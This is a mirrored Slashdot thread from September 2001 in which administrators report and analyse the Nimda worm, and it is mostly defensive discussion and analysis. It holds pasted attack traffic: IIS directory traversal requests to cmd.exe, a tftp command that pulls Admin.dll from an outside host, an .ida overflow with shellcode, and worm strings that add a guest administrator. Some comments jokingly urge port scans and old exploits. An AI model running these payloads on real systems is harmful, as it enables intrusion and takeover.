Slashdot Mirror
New (More) Annoying Microsoft Worm Hits Net
Here are examples of the requests it's sending:
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../
..%c1%1c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
While writing this story I was hit a total of 4 times, 16 GET attempts per attack. In only 4 minutes. Also of interest, My desktop has now been hit about 500 times today, all from 208.x.x.x IPs. This might be really bad. I still haven't read anything about this anywhere else, so you heard it here first ;)
Update Web servers compromised by this worm apparently attach a "readme.eml" to all web pages served... and due to a bug in IE5, it will automatically execute the file! Yay Internet Explorer!
Or is it something new?
Looks like an exploit that's been around for a while (way before CR)
Trolls throughout history:
Jonathan Swift
And it suddenly had to back up once a week after Code Red started thwacking my machine. Perhaps I should write a script to exploit the root-hack and shut down the affected machines so that the local cable circuit won't be clogged with that crap. I can't imagine how bad this will get.
It's not like @Home (in my area) is doing *anything* to stop this. I really think that they should be policing for such disruptive activities and informing their customers when unsecured machines on their network are comprimised.
STOP MISUSING APOSTROPHES, YOU MORONS!!!
I'm seeing massive numbers of timed out requests on my sytems this morning. It started at exactly 9:06 eastern time.
I checked one of the IPs and it said 'Fuck USA Government, Fuck PoisonBOx' and opened a second window with what looked like a MIME buffer overflow attempt. I run Opera on Linux so it didn't effect me. It looks like we may be getting hit in a shotgun approach. My systems are in the 207.227 range and 208.
Brian
Remember Lexington Green!
The 208.x.x.x is similiar to Code Red in that it attempts to scan local subnets (I bet you are have a 208.x.x.x IP); therefore, naming it 208 is only good for those in your Class A. We have received attempts from over 100 hosts infected with the Code Red 2 worm, starting from the local class C, then class B, and now class A and others. It appears to be attempting to find rooter servers, for what purpose I can only imagine.
www.iitelecom.qc.ca - - [18/Sep/2001:08:10:05 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 281
www.iitelecom.qc.ca - - [18/Sep/2001:08:10:05 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
www.iitelecom.qc.ca - - [18/Sep/2001:08:10:06 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
www.iitelecom.qc.ca - - [18/Sep/2001:08:10:06 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/syst em32/cmd.exe?/c+dir HTTP/1.0" 404 322
www.iitelecom.qc.ca - - [18/Sep/2001:08:10:07 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/syst em32/cmd.exe?/c+dir HTTP/1.0" 404 322
www.iitelecom.qc.ca - - [18/Sep/2001:08:10:07 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c 1%1c../..%c1%1c../winnt/system32/cmd.
--
"It is now safe to switch off your computer."
Yeah.. While I'm on Win2K and running a web server, it would never occur to me to run IIS. My logs are totally filled up with traces of this new worm. The logs also include lines such as this (IP censored).
/scripts/root.exe?/c+tftp%20-i%20212.163.x.x%20GET %20Admin.dll%20Admin.dll 212.163.x.x
GET
Interesting..
On the upside, I haven't had a single hit by Code Red in the past hour or so! Let's hope this one is nasty enough to get the people to finally shut down / fix their boxes!
Why won't someone port these to linux? Microsoft Operating Systems seem to have a monopoly in this field. For now, if you read this in a *nix, just portscan your netmask and a few others and try a few old wu-ftp exploits.
"You have new mail, you open it. Your server begins port scanning every box on the internet. Do the server's mind? Of course not, they have nothing better to do." - New Microsoft Ad?
Chaos, Mayhem, and Destruction: Not
This kinda stuff isn't nice for unix servers either. I have both FreeBSD with Apache and Linux with Tomcat doing stuff and every time a worm like this comes along, my stuff drags to a halt and occaisionally crashes (if my app server is set up in a fragile way). At least I won't be perpetuating this one though.
Helping with organizational effectiveness is our job.
I noticed that this morning on my various IDS's and was going to post on OT message in another story to see if it was affecting many people.
I get them from inside the local net.
I can't believe this stupid Code Red crap is still going on. I've gotten used to the constant hits. And now am I going to have to get used to this junk?? Argh! I'm just firewalling them off as they hit.
Security focus has some information on it, we're seeing shedloads of hits at the moment :(
-- The Flying Hamster
1300 hits so far. Each infected machine seems to be making a LOT of attempts.
Here we go again...
Here is how it is done:
Tools>Options>Security>check "Do not allow attchments to be saved or opened that could potentially be a virus"
I am seeing these hits too. Since 18/Sep/2001:07:27:25 -0600 (it is now 09:16) I have been hit by 120 different machines. 105 of them are on my class B, 128.138, 14 more just start with 128, and only one is from a totally different address.
Perhaps I should contact the admins at my site who are in charge of the offending machines.
I see it looking for the exploit Code Red used, trying out MSADC and a directory traversal exploit.
My money's on the Code Red worm being retrofit yet again to try and execute a few more tired old exploits. Which is to say hopefully Hotmail and Windows Update won't get rooted again.
Haven't heard anything about it on Bugtraq yet; haven't checked Incidents (securityfocus.com isn't chugging along so speedily).
It'll be interesting to see how many boxes this roots out in the light of increased press coverage of Code Red and MS's spate of security-minded tools out there. Or: how good do people feel about that leaky dam now that they've stuck their thumb in the hole labelled "Code Red"?
Easy does it!
This comment has been submitted already, 276865 hours , 59 minutes ago. No need to try again.
Wow - I've got about 1000 similar hits in my logs, starting from around 6.30am this morning. From a variety of different IP addresses.
63.73.31.242 just hit me 16 times.
Going to http://63.73.31.242 indicates:
"National Aerospace Documentation Home Page"
and attempts to launch a "readme.exe" executable immediately.
Just checked another site: 63.168.150.72 - plain old IIS page, but attempts to launch the same executable.
So, we have Code Red, with an added attempt to launch a (no doubt) malicious executable from infected pages.
Damn. I just got an e-mail from my ISP (corporate LAN/WAN) telling us of this. Here's their text:
~~~~~~~~~~~~~
Many ISPs, including [ISP], are under attack by a new worm that appears to be related to the recent CodeRed worm. This worm attacks Microsoft web servers via a known vulnerability and seeks to replicate itself by searching for other vulnerable servers.
The traffic caused by this worm has caused severe network problems worlwide this morning (18 Sep 2001) according to many ISP-related mailing lists. More information will be sent to this announcement list as it becomes available.
~~~~~~~~~~~~~
OK, so they say it's a Code-Redish bug. According to Taco's post, it's not even close (sort of).
I'm using *NIX/Apache.
I'm not gonna worry about this one (yet again...). Y'all with them damn Win boxes keeping the Internet flooded with this sort of junk, PLEASE either shut of your machines, or get a real OS...
(or at least, apply the damn patch already)
I'm not a prophet or a stone-age man,
I'm just a mortal with potential of a super man.
Evidence from compromised boxes elsewhere on campus seems to indicate that this bug will create a ton of *.eml files on the computer and they are all about 78k. Wehaven't received an .eml file in hand yet, to view the contents. A variety of .eml files are created, including "desktop.eml",
"readme.eml", etc.
A compromised system will attach a readme.eml file to the bottom of all web pages served. This is because there is currently a bug out for IE5 that will auto execute any given .eml file.
Need a UNIX/Linux/network guru in the Boulde
The new patches may well stop this one. No one implements the patches, which is why Code Red 2 packets are still flying all over every subnet on @Home.
Microsoft may be partly to blame, but it's not for being irresponsible in patching these issues; it's for allowing idiots who don't know how to properly administrate and who will never do security checks to easily run MS servers -- often without realising that the server exists.
STOP MISUSING APOSTROPHES, YOU MORONS!!!
If they're using all-new exploits, it may be that there ISN'T a patch to apply. Furthermore, getting Windows users to apply patches is spotty at best- users often don't even realize that they're running a web server on their box.
I am not merely a "consumer" or a "taxpayer". I am a Citizen of the State of Texas
Anyways here's the sequence of attempts it makes, trying to capitalize on old worms that weren't cleaned up properly, as well as known unicode exploits.
2001-09-18 15:10:19 *.*.*.* GET
2001-09-18 15:10:19 *.*.*.* GET
2001-09-18 15:10:19 *.*.*.* GET
2001-09-18 15:10:19 *.*.*.* GET
2001-09-18 15:10:19 *.*.*.* GET
2001-09-18 15:10:19 *.*.*.* GET
2001-09-18 15:10:20 *.*.*.* GET
2001-09-18 15:10:20 *.*.*.* GET
2001-09-18 15:10:20 *.*.*.* GET
2001-09-18 15:10:20 *.*.*.* GET
2001-09-18 15:10:20 *.*.*.* GET
2001-09-18 15:10:20 *.*.*.* GET
2001-09-18 15:10:21 *.*.*.* GET
2001-09-18 15:10:21 *.*.*.* GET
2001-09-18 15:10:21 *.*.*.* GET
2001-09-18 15:10:21 *.*.*.* GET
Furthermore every attacking system was in the same 255.0.0.0/8 as the target system so it appears to target in the same "Class A" address (of course in this case it's 216.x.x.x so it's not really Class A, but you get the point).
When the dir command succeeds (or rather, when the worm believes it has succeeded), the next request has a tftp command embedded in it which attempts to install a file called Admin.dll. Following that, there is a request for the dll itself, which presumably kick starts the worm.
I'll take a look at Admin.dll later today.
I like to play children's songs in minor keys.
"We're all sons of bitches now." --J. Robert Oppenheimer
The 'Fuck PoisonBox' you're getting is due to the Sadmind virus.
o r.sadmind.html
More at:
http://www.symantec.com/avcenter/venc/data/backdo
If there's a patch, they should have applied it (If it breaks things, well, perhaps Windows isn't something they should be using...). If the patch doesn't fix this, they should be screaming at MS. If this is a new exploit maybe they should be screaming at MS and checking into a new system design...
I am not merely a "consumer" or a "taxpayer". I am a Citizen of the State of Texas
It has a very high probability of /16 hits as well as /8 hits.
It's using about 50% of my modem bandwidth with about 20 IP addresses with port 80 active. It's so bad, I closed down most of my ports 80.
Snort has been picking this up as IDS297 (directory traversal) and 102:1:1 (ISS Unicode attack) at our location since about 9:00am EDT.
We are seeing very heavy activity (not as bad as Code Red) since then.
From NTBugTraq
w32.nimda.amm
Just wait till some crappy band steals your nic.
I contacted UUNET (My T1 provider) and they told me it was a strain of Code Red. It seems to be everywhere. I have isolated a few dozen IP's from my logs already. I have contacted the web admins of the sites in question as well. I am getting about 100+ hits a minute now, utilizing about 10%-20% of the T1 the main webserver is on. I'm guessing this will be a problem for everyone, even if your not running IIS, or your server is patched (like mine), the hundreds of scans can eat your bandwidth away regardless.
-S
-Sternn
apache_1adminconfig
fontsmrtns2
apacheroutedelete
hpfontsmod_perl-1
gettime
big-sister-0
apachejmeter_1
pdfwritr
apache-contrib1lo66293
routedelete
autoexec
apachejmeter_1mod_phantomimap
No ideas...got me what it's doing.
I've been getting these, as well as SirCam messages, the "Hi! How are you? I send you this file to ask for you advice..." with ATT0000059.TXT, a 59-byte file, and ATT0000059.DAT, 159KB that looks like it contains some type of executable code.
I've also gotten the snippits of the registry:
"ware\Microsoft\Windo,b4 pull123"
Anyone have any ideas about this? I haven't opened anything except the messages, and Windows 2000 is pretty secure, but I'd rather not get infected with something if possible.
I wonder if our servers are being scanned...
Aside from the Code Red usual suspects who've been hitting my server, I've seen a shitload of these, too.
It doesn't even have a cool name yet. feh.
What we call folk wisdom is often no more than a kind of expedient stupidity.-Edward Abbey
-----BEGIN PGP SIGNED MESSAGE-----
/scripts and /msadc directory, as well as an attempt to use the /c and /d virtual roots to get to CMD.EXE). Further, it attempts to exploit numerous other known IIS vulnerabilities.
/scripts directory), please forward me a copy of that .dll ASAP.
M DU ChVqn6yReQXqEH
J Uu pDHB1Yy1DY/po6
a mK I2eqd4TdE0yfIO
There have been numerous reports of IIS attacks being generated by machines over a broad range of IP addresses. These "infected" machines are using a wide variety of attacks which attempt to exploit already known and patched vulnerabilities against IIS.
It appears that the attacks can come both from email and from the network.
A new worm, being called w32.nimda.amm, is being sent around. The attachment is called README.EXE and comes as a MIME-type of "audio/x-wav" together with some html parts. There appears to be no text in this message when it is displayed by Outlook when in Auto-Preview mode (always a good indication there's something not quite right with an email.)
The network attacks against IIS boxes are a wide variety of attacks. Amongst them appear to be several attacks that assume the machine is compromised by Code Red II (looking for ROOT.EXE in the
One thing to note is the attempt to execute TFTP.EXE to download a file called ADMIN.DLL from (presumably) some previously compromised box.
Anyone who discovers a compromised machine (a machine with ADMIN.DLL in the
Also, look for TFTP traffic (UDP69). As a safeguard, consider doing the following;
edit %systemroot/system32/drivers/etc/services.
change the line;
tftp 69/udp
to;
tftp 0/udp
thereby disabling the TFTP client. W2K has TFTP.EXE protected by Windows File Protection so can't be removed.
More information as it arises.
Cheers,
Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor
-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.5.2
iQCVAwUBO6dmcRBh2Kw/l7p5AQHJCgQA1JHwqF5RjJX+QVM
Tm8Ujms5+6ia0tcT1qmZWJV48eHYNzV3+AyyO6Gn8ds/NVY
iycY2qnARDJP6KNmHI0bAdBUBtsnVo5P9itElIoqKbAorQj
hSW7yN2lhJc=
=YAwc
-----END PGP SIGNATURE-----
I timed out trying to get to the link. /.ed, or DOD?
science is a religion
Just when I was hoping my cable company would unblock my HTTP port (which they said was "temporary"). Unfortunately, this will give them more fuel to make it permanent.
The HTTP port doesn't bug me as much as they have also blocked my mail port.
Question for sendmail experts out there, related to this: I'm currently using another system to tunnel my mail to my box on my cable modem. It works great, but a side effect is that it looks like all mail is coming from "localhost", which defeats the anti-Spam measures. Of course, it didn't take long for the cockroaches to find my mail server and use it for relaying. I've been fighting it by blocking specific subnets, but it's an annoying battle. Any suggestions?
Sometimes it's best to just let stupid people be stupid.
Add this to your in-house SnortRules file.
alert TCP $EXTERNAL_NET any -> $HOME_NET 80 (msg:"AfterRed Worm"; flags: A+; content: "/cmd.exe"; nocase;)
echo '[q]sa[ln0=aln80~Psnlbx]16isb572CCB9AE9DB03273snlbxq' |dc
Declaring "cyberwar" on Afghanistan is a lot like threatening to blow up Kabul's world trade center.
Oh, they don't have one? Exactly.
I'd imagine most "cyberwar" would focus on Pakistan, but they're helping us already.
What we call folk wisdom is often no more than a kind of expedient stupidity.-Edward Abbey
Those machines must have a lot of probe threads running -- I got hit by a site at 8:47 and again at 10:25. (Or else the random number generator in the worm is bad.)
... I can't even get a ping through.
My DSL to home is completely swamped
Email: slashdot3@FreeMars.org (Address will be abandoned when it gets spam.)
My first log entry for this attack is at 8:08 AM. Just FYI.
Davis Ray Sickmon, Jr - looking for something to read? Check out my three free novels at MidnightRyder.org
At the height of code red I was getting ~60 hits a day. This beast has hit my system over 3000 times today.
Yow.
There's more to it than this.
I just samspaded one of the IP's thats been hitting our site. it places a bit of javascript code at the bottom of the page that basically forces IE to download readme.exe. DO NOT TRY TO GO TO AN INFECTED IP ADDRESS.
If we really are seeing a marked increase in worm traffic (and it's not just everyone suddenly noticing, now that others have brought it up -- just being cautious, eh?), then could it be possible that this might be part of, or a prelude to, a DDOS attack?
The NIPC issued the following advisory: Potential Distributed Denial of Service (DDoS) Attacks on Monday, talking about reports of people preparing for DDOS attacks on computer and commerce infrastructures. In particular: On September 12, 2001, a group of hackers named the Dispatchers claimed they had already begun network operations against information infrastructure components such as routers. The Dispatchers stated they were targeting the communications and finance infrastructures. They also predicted that they would be prepared for increased operations on or about Tuesday, September 18, 2001.
Of course, this could just be an ill-timed release of yet another worm (like there're "well-timed" releases?). I just thought that this was particularly spooky, reading this alert after seeing this worm story...
It appears that this new worm is appending the following JavaScript snippet to all pages that the server sends:
Not sure what this JavaScript is suppose to do, but it's there none the less.
- Matt
Still have access to one of the systems i used to run at my alma mater. im getting SCREENFULLS of logs scrolling by, super fast. Many many hits.
This looks bad.
Some of the lines from the registry it tries to import:
e rs \Interfaces Concept Virus(CV) V.5, Copyright(C)2001 R.P.China MIME-Version: 1.0
SYSTEM\CurrentControlSet\Services\Tcpip\Paramet
Search for 'Concept Virus' to see if you're infected, I guess.
First hit here (Los angeles) ... 18/Sep/2001:07:27:37 -0700
Mooniacs for iOS and Android
Taco would've know about this months ago. It was annouced here.
My wife called from home saying, "Something is putting EML files all over my computer...(pause)...and yours too"
I am running IIS on win2k, have applied the code red patch. Note: I am building the Linux/Apache server RIGHT now, so IIS is on the way out. But if anyone has any idea how this is happening, I'd love the info.
Looks like this thing kicked off almost excatly one week after the WTC stuff.
Krispy Cream is people
Wouldn't it make buffer overruns harder if stacks grew the other way? Is there a reason why a stack can't go upwards?
TruSecure ALERT- TSA 01-023 - W32.nimda.a.mm
Date: September 18, 2001
Time: 1000 EDT
RISK INDICES:
Initial Assessment: RED HOT
Threat: VERY HIGH, (rapidly increasing)
Vulnerability Prevalence: VERY HIGH, effects IIS servers version 4.0,
5.0, and internal networks.
Cost: High, command execution is possible
Vulnerable Systems: IIS 4.0 and 5.0
SUMMARY:
A new IIS worm is spreading rapidly. Its working name is Nimda:
W32.nimda.a.mm
It started about 9am eastern time today, Tuesday,September 18, 2001,
Mulitple sensors world-wide run by TruSecure corporation are getting
multiple hundred hits per hour. And began at 9:08am am.
The worm seems to be targeting IIS 4 and 5 boxes and tests boxes for
multiple vulnerabilities including:
Almost all are get scripts, and a get msadc (cmd.exe)
get_mem_bin
vti_bin owssvr.dll
Root.exe
CMD.EXE
../ (Unicode)
Getadmin.dll
Default.IDA
/Msoffice/ cltreq.asp
This is not code red or a code red variant.
The worm, like code red attempts to infect its local sub net first,
then spreads beyond the local address space.
It is spreading very rapidly.
TruSecure believes that this worm will infect any IIS 4 and IIS 5
box with well known vulnerabilities. We believe that there are
nearly 1Million such machines currently exposed to the Internet.
Risks Indices:
Vulnerability VULNERABILITY PREVALANCE is very high - Milllions of
Internet Web server hosts: TruSecure process and essential
configurations should generally be protective. The vulnerability
prevalence world-wide is very high
Threat - VERY HIGH and Growing The rate of growth and spread is
exceedingly rapid - significantly faster than any worm to date and
significantly faster than any variant of Code red.
Cost -- Unknown, probably moderate per infected system.
The worm itself is a file called
README.EXE, or ADMIN.DLL
a 56K file which is advertised as an audio xwave mime type file.
Other RISKS:
There is risk of DOS of network segments by traffic volume alone
There is large risk of successful attack to both Internet exposed IIS
boxes and to developer and Intranet boxes inside of corporations.
Judging by the Code Red II experience, we expect many subtle routes
of infection leading to inside corporate infections.
We cannot discount the coincidence of the date and time of release,
exactly one week to (probably to the minute) as the World Trade
Center attack .
REPLICATION:
There are at least three mechanisms of spread:
The worm seems to spread both by a direct IIS across Internet (IP
spread)
It probably also spreads by local shares. (this is not known for
sure at this time)
There is also an email vector where README.EXE is sent via email to
numerous accounts.
Mitigations
TruSecure essential practices should work.
Block all email with EXE attachments
Filter for README.EXE
Make sure IIS boxes are well patched and hardened, or removed from
both the Internet and Intranets.
Make sure any developer computing platforms are not running IIS of
any version (many do so by default if either.
Disconnect mail from the Internet
Advise users not to double click on any unexpected attachments.
Update anti-virus when your vendor has the signature.
Step 1. Get BSD or Linux
Step 2. Install.
Problem fixed.
Best Slashdot Co
I started getting hit by computers on my subnet at 7:34:46am Mountain time (9:34am eastern time).
Nasty, each computer hit me at least 16 times, and my log is growing fast. (Good thing my logs are in their own partition).
MadCow.
I used to have a sig, but I set it free and it never came back.
2001-09-18 05:45:32 195.124.124.237 - 216.119.90.176 GET /default.ida
o _my_sisterli_'Doro'.Save_Whale_and_visit_<www.b uhaboard.de>_and_<www.buha-security.de>%u 9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u90 90%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003 %u8b00%u531b%u53ff%u0078%u0000%u00=a
Code_Green_<I_like_the_colour-_-><AntiCod eRed-CodeRedIII-IDQ_Patcher>_V1.0_beta_written_ by_'Der_HexXer'-Wuerzburg_Germany-_is_dedicated_t
200 206 5995 500 HTTP/1.0 - - - -
Here are some interesting strings found in the readme.exe this worm sends down (some stuff snipped):
S ha res\Security
/add
/add
/active
/add
. %c 1%1c../..%c1%1c..
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
SYSTEM\CurrentControlSet\Services\lanmanserver\
share c$=c:\
user guest ""
localgroup Administrators guest
localgroup Guests guest
user guest
open
user guest
HideFileExt
/scripts
/MSADC
/scripts/..%255c..
/_vti_bin/..%255c../..%255c../..%255c..
/_mem_bin/..%255c../..%255c../..%255c..
/msadc/..%255c../..%255c../..%255c/..%c1%1c../.
/scripts/..%c1%1c..
/scripts/..%c0%2f..
/scripts/..%c0%af..
/scripts/..%c1%9c..
/scripts/..%%35%63..
/scripts/..%%35c..
/scripts/..%25%35%63..
/scripts/..%252f..
/root.exe?/c+
/winnt/system32/cmd.exe?/c+
net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
Admin.dll
c:\Admin.dll
d:\Admin.dll
e:\Admin.dll
window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
/Admin.dll
qusery9bnow
-qusery9bnow
\mmc.exe
\riched20.dll
boot
Shell
explorer.exe load.exe -dontrunold
\system.ini
\load.exe
I wasn't able to get to Security Focus to see what they had on this but I was able to get to CERT. They have this on their current activity page.
As of now there's not much more information there than is in the story already.
Other than the Code Red II backdoor it looks like it's mainly trying to exploit the unicode url hole.
EOF
It doesn't seem to execute under Windows 2000. When the payload attempted to run, it failed and a Dr. Watson error occurred.
_Very_ nasty, until IE 5 is patched!
smtp strings
mime stuff
mapi stuff
winzip
http stuff
richtext dll stuff
hidden shares stuff
webserver sploits
net use stuff
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
...try this. its a pretty quick hack, and you'll need to modify the path to your apache logs in the grep line. but its what I just whipped up. hope its useful. I just ran it and it works for me.
/var/log/httpd/error_log | awk '{print $8}' | sed -e s/]//`; do
#!/bin/sh
for LUSER in `grep "winnt"
if [ ! "`ipchains -L -n | grep $LUSER`" ]
then ipchains -A input -s $LUSER -d 0/0 -j DENY
fi
done
I keep trying to pick fights, but I can't shake this Excellent karma.
I'm sorely tempted to write my ISP (ATT/Roadrunner) and say "Look, guys, do the math. Every Windows machine you have propagates X connections. Every Linux machine you let run propagates *0*. Shouldn't you consider officially encouraging people to run Linux?" But I expect that if I do that, they'll miss the point entirely and say "You're running Linux? Gasp! You're in violation of the terms of service!" It bugs me, because this seems like such a clear argument. Note that I didn't even say "make" people run it, just encourage. More Linux means less viruses. Seems like ISPs would think that's a good idea.
www.HearMySoulSpeak.com
It doesn't seem to be a new exploit. Just another package for the existing exploits. So, make sure you're current and you should be OK.
On the side...I haven't gotten any hits in our log files yet.
To start putting in my posts. I know keeping a sense of humor is difficult lately, especially for those of us in target zones, but, Christ, do I need to start putting "Imagine a beowulf cluster of these" in every post?
Best Slashdot Co
Care to explain how anything that helps convince people not to use Microsoft can be called "annoying" ;-)
This is the preliminary information known at this time.
There is a new mass-mailing worm that utilizes email to propagate itself. The threat arrives as readme.exe in an email.
In addition, the worm sends out probes to IIS servers attempting to spread by using the Unicode Web Traversal exploit similar to W32.BlueCode.Worm. Compromised servers may display a webpage prompting a visitor to download an Outlook file which contains the worm as an attachment.
Also, the worm will create an open network share allowing access to the system. The worm will also attempt to spread via open network shares.
We've got three infected workstations out of six here at work now. We were already planning on putting in six Linux workstations, but now we're going to have to go to all Linux (and Mac for the artists). This is ridiculous.
Any one of you damn "Stop bashing Microsoft, it could happen to any OS" bastards who comes on here is going to get a beating. Maybe it could, but it doesn't, and I for one am sick and tired of this crap. Goodbye, MS.
If it ain't broke, you need more software.
Microsoft has cost ISPs, businesses, and end users an incalculable amount of money and frustration and it is all due to their negligence. They were negligent when they created software and technologies that are so easily exploited. They were negligent in their testing of their products. They were negligent in not sending patch CDs through the mail to registered users. If they can send you upgrade offers via the mail, they can send you patch CDs to repair their defective products.
And before anyone starts quoting the Microsoft license, ISPs that run Linux/*BSD/Solaris are being hurt by the traffic, too. They have no license with Microsoft and they've been injured by Microsoft's negligence.
I'd like to see AOL, Earthlink, or some other big ISP take Microsoft's corporate butt to court, demanding compensatory and punitive damages for Microsoft's negligence.
Now this subject isn't exactly meaningless, but it certianly is suspicious.
I'm not Windows bashing- I'm pointing out something that is a real problem.
1) Linux/UNIX is not invulnerable, but it's been years since the Morris Worm. We're seeing a spate of this sort of stuff under NT- why? Is it because of sloppy admin work, lack of overall security in the design of Windows, or both?
2) If you can't apply security patches because it'll break your machine, then maybe there IS a problem with the OS.
I am not merely a "consumer" or a "taxpayer". I am a Citizen of the State of Texas
If you want to see how bad this has become, look at the current internet traffic report. Internet traffic appears to have come to a halt. It can't really be as bad as it looks there (since I can still get through :), but this corresponds to the time I started seeing the attack in my server logs.
I remember reading something about someone doing this back when CodeRed II came out. He had a simple CGI to submit a shutdown command to the inquiring machine. Cool. :)
He's almost certainly *not* the originator.
This is not just a Code-Red like virus, it's also a mass mailer (like SirCam). This is going to be bad for the unprotected, and worse for the protected, because we suffer the clawback after effects.
Matt. Want XML + Apache + Stylesheets? Get AxKit.
18/Sep/2001:06:16:18 -0700 here in Vancouver.
It's only software!
- Turn off any infected machine
- Prevent port 80 access for everyone
- Ignore it
1 is possible but it going to be a fair bit of work, 2 is going to peeve off a number of people but will solve the problem and 3 will just allow their whole network to grind to a halt.Don't know about everyone else but if this keeps up (with this virus and the 100 just around the door) we won't see many ISP's allowing web servers to run at all, ever.
(As a subnote, my bosses cable modem company, NTL, specifically forbid running a server on your own machines - although, as yet, they don't activily police it)
Avantslash - View Slashdot cleanly on your mobile phone.
Did a file search on my computer and found 'admin.dll' in two places. One was in c:\windows\system32\dllcache and the other was in C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\_vti_adm
.eml files or readme.exe, and I have patched against the Code Red exploits.
I do have IIS installed because I have done some web development (it's for my company, I'd rather they use Apache or somesuch, but...) I've also seen the 'alerts' and they state that the wormed 'admin.dll' is a 56k file -- mine is only 20k. What worries me is that if I delete it from either location it reappears within seconds from apparently nowhere. Anyone else have info regarding the filesize or the persistance of admin.dll?
I don't have any
STOP MISUSING APOSTROPHES, YOU MORONS!!!
The fine points of Internet ethics seem a little insignificant now compared to the harm that this new infection is doing. What next?
My estimate of intensity of this one is that it is costing me about 10 times the bytes per second of CR2. (We pay for our bytes in Australia!)
208.
207.
65.
63.
For the record, I'm in 208.
I would forward this to the Help Desk people here, but then they'd know I was reading
Just e-mail them this link: www.glowingplate.com/ida.shtml. Tell them that a friend sent it to you.
The link goes to a page offering a real-time view of the new worm attacking my machine.
Fire and Meat. Yummy.
--Mike--
IE6 tried opening it with Windows Media Player and then it said that the format wasn't recognized. So my guess is that it's not vulnerable.
...but then, as it's trying everything, it would be...
Exactly. I'm too young too. But I'm not too young to remember Melissa, Kournikova, Code Red, et al. It's constant. It happens all the damn time. And I'm fed up with it.
If it ain't broke, you need more software.
...and it's actually quite clever if you look closely...
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="
--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
--====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID:
Easier method:
.eml extension with Notepad. NOTE: this may affect Outlook since the .eml is an extension used for mail stores. Use at your own risk.
Create a text file and name it something like eml.reg. Right click, select Edit. Paste the following lines into the file:
REGEDIT4
[HKEY_CLASSES_ROOT\.eml]
@="Microsoft Internet Mail Message"
"Content Type"="text/plain"
And save the file. Double click and it will add itself to the registry. This will re-associate the
There is no reasonable defense against an idiot with an agenda
:wq
* to the theme of Joan Jett's "I love rock and roll" *
I LOVE IIS, PUT ANOTHER WORM IN MY SERVER BABY!
I'm on Earthlink (4.3.x.x) and have 732 different IP's logged trying to hit me using this new technique. Ouch.
Looks like it's spreading.
--- witty signature
I hope Mo won't mind me forwarding this...
/24, then /16.
----- Forwarded message from Mo McKinlay -----
From: Mo McKinlay
Subject: Re: [uknot] Today's Virus
To: uknot@uk.com
Date: Tue, 18 Sep 2001 17:18:46 +0100
X-Virtual-Domain: redirected for markl@ftech.net
X-Virtual-Domain: redirected for hamster@vom.tm
On Tue, Sep 18, 2001 at 04:36:11PM +0100, Joel Rowbottom wrote:
> This seems to be the culprit:
>
> Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
It is.
It's also known as "w32.nimda.mm". From what I can tell, it's delivered
by:
a) visiting an infected site while using vulnerable browser+e-mail
client
b) recieving e-mail from infected host
c) IIS directory traversal exploit (a la codeblue, which I'm informed
was never seen in the wild)
d) open SMB/CIFS shares
It then goes on to:
* perform *numerous* registry hacks - it seems to alter the nameserver
setting of the TCP interface.
* append a small piece of malicious javascript to your default webpage
so that attack vector (a) happens.
* alter the security on your default shares
* alter the performance logging configuration
* attempt to propagate itself to addresses in your
* attempt to propagate itself via e-mail
* attempt to propagate itself to open SMB/CIFS shares
* I've had reports that uses tftp to grab something.. can't ascertain
what/from where, though. this could be confusion.
* it references winzip32.exe for some purpose (could support the
previous report)
* alters your startup parameters to ensure it's re-run at boot time.
That's what I can gather from the various reports, and from scanning the
readme.exe.
Mo.
--
Mo McKinlay mmckinlay@gnu.org http://ekto.org
"but every time you call a function a object orientated fairy dies"
-- Richard Palmer, spod.
GnuPG/PGP Key: pub 1024D/76A275F9 2000-07-22
----- End forwarded message -----
http://www.gimbo.org.uk/
Not only has this a result of negligence but also a result of false claims that their products are just as secure as Unix, just a robust as Unix, and just as fast as Unix. They've mislead consumers regarding by funding biased comparisons, flawed white papers, and paid-customer endorsements. I believe this is nothing short of fraud.
Of course we torture people, we need the information --Gen. Pinochet
I just checked www.internnettraficreport.com. All their indices are down at zero. Very odd.
Does anyone have more information about the IE5 part of this? How does it spread? What exactly spreads? How do you find out if you are infected and does this also work for IE5.5 and IE6 or is it only IE5.0x?
I checked one of the IPs and it said 'F*ck USA Government,
Aparently that was enough to get the attention of the FBI during the heightened attentions to security. I really pity whoever launched this thing if they aren't affiliated with Bin Laden et al, since any threat to the US government will now be considered an act of wart and will be dealt with accordingly.
The linked article notes that NIPC was anticipating an attack from a group called 'Dispatchers' to hit sometime today.
Work for Change & GET PAID!
On a system I have that got infected it places an EML file in the startup folder, so when you startup it launches Outlook Express and starts all over again.
Krispy Cream is people
Unless you can actually find a timestamp string inside, I suspect it's just that - a coincidence.
